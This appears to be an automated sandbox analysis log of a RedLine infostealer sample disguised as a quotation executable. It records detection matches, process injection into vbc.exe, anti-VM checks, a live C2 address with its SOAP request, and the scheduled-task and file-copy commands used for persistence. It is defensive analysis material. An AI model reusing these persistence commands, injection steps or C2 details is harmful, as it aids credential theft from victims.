                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: vbc.exe, 00000005.00000002.573337691.0000000007825000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.573780220.0000000007A27000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.580618835.000000000BB51000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.574018688.0000000007AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697578487.000000000708D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.697970804.000000000720F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.704639232.000000000BE21000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.698300479.00000000073A6000.00000004.00000800.00020000.00000000.sdmp, tmpC52C.tmp.5.dr, tmp31D7.tmp.5.dr, tmpCB41.tmp.21.dr, tmp6032.tmp.21.dr, tmp2EB7.tmp.5.dr, tmp2F83.tmp.5.dr, tmp870.tmp.5.dr, tmp6A58.tmp.5.dr, tmp21C5.tmp.5.dr, tmp686D.tmp.21.dr, tmp30DC.tmp.5.dr, tmp2D4F.tmp.5.dr, tmpEFE7.tmp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: unknown HTTP traffic detected:
                            POST / HTTP/1.1
                            Content-Type: text/xml; charset=utf-8
                            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                            Host: 185.222.58.90:17910
                            Content-Length: 137
                            Expect: 100-continue
                            Accept-Encoding: gzip, deflate
                            Connection: Keep-Alive
                        Source: unknown DNS traffic detected: queries for: api.ip.sb

                        System Summary

                        Source: initial sample Static PE information: Filename: QUOTATION 061622.exe
                        Source: QUOTATION 061622.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 14.2.Data.exe.36a1f70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.368a150.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.3851f70.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 5.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.36a1f70.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 21.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 14.2.Data.exe.368a150.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: 0.2.QUOTATION 061622.exe.383a150.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Code function: 0_2_04E2B100 CreateProcessAsUserA,0_2_04E2B100
                        Source: QUOTATION 061622.exe, 00000000.00000002.481807848.0000000002831000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION 061622.exe
                        Source: QUOTATION 061622.exe, 00000000.00000002.482019923.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs QUOTATION 061622.exe
                        Source: QUOTATION 061622.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: Data.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: QUOTATION 061622.exe Virustotal: Detection: 44%
                        Source: QUOTATION 061622.exe ReversingLabs: Detection: 48%
                        Source: QUOTATION 061622.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown Process created: C:\Users\user\Desktop\QUOTATION 061622.exe "C:\Users\user\Desktop\QUOTATION 061622.exe"
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\QUOTATION 061622.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown Process created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown Process created: C:\Users\user\AppData\Roaming\Data\Data.exe C:\Users\user\AppData\Roaming\Data\Data.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe File created: C:\Users\user\AppData\Roaming\Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Local\Temp\tmp4B03.tmp
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/40@4/1
                        Source: QUOTATION 061622.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5820:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_01
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: QUOTATION 061622.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: QUOTATION 061622.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        Source: QUOTATION 061622.exe | String found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exe, 00000000.00000002.481602572.0000000000B72000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: dotNetProtector
                        Source: QUOTATION 061622.exe, 00000000.00000000.419307986.0000000000B72000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000E.00000000.497633668.0000000000F82000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000000E.00000002.581973929.0000000000F82000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000001F.00000002.694768083.0000000000F82000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: dotNetProtector
                        Source: Data.exe, 0000001F.00000000.625893494.0000000000F82000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: dotNetProtector
                        Source: Data.exe.10.dr | String found in binary or memory: dotNetProtector
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_00B78F63 push ecx; iretd 0_2_00B78F64
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_00B78EAE pushad ; iretd 0_2_00B78EAF
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_02812C9F pushad ; iretd 0_2_0281794D
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_0281E48D pushad ; iretd 0_2_0281E4AD
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_0281E85C push edx; iretd 0_2_0281E85D
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_04D906AC push esp; iretd 0_2_04D906CB
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_04E24CA7 push ds; iretd 0_2_04E24CA9
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Code function: 0_2_04E35090 push es; retf 0_2_04E35132
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFCD67 push cs; ret 5_2_09BFCD6A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFC198 push es; ret 5_2_09BFC19A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFC190 push es; ret 5_2_09BFC196
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFE1F8 push eax; retf 5_2_09BFE1F9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFE1F0 pushad ; retf 5_2_09BFE1F1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFC141 push es; ret 5_2_09BFC142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_09BFB5E0 push cs; ret 5_2_09BFB5F4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0A8F43B9 push eax; retf 5_2_0A8F43BD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0A8F35B8 push eax; ret 5_2_0A8F35C9
                        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Data\Data.exe

                        Boot Survival

                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

                        Hooking and other Techniques for Hiding and Protection

                        Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (67).png
                        Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49780
                        Source: unknown | Network traffic detected: HTTP traffic on port 49849 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49849
                        Source: unknown | Network traffic detected: HTTP traffic on port 49859 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49859
                        Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49915
                        Source: unknown | Network traffic detected: HTTP traffic on port 49917 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49917
                        Source: unknown | Network traffic detected: HTTP traffic on port 49918 -> 17910
                        Source: unknown | Network traffic detected: HTTP traffic on port 17910 -> 49918
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exe TID: 5948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 3596Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6784Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6784Thread sleep time: -35000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 6692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7060Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7060Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 6224Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 3303Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2597Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2313Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                        Source: vbc.exe, 00000015.00000002.701850058.000000000A2CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: vbc.exe, 00000015.00000002.701850058.000000000A2CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareYTNFO449Win32_VideoControllerK6ZKDALEVideoController120060621000000.000000-00099.6072.display.infMSBDALW7XN8VTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsUZ7_6S26l
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess queried: DebugPort
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 56AA008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 8D1008Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION 061622.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
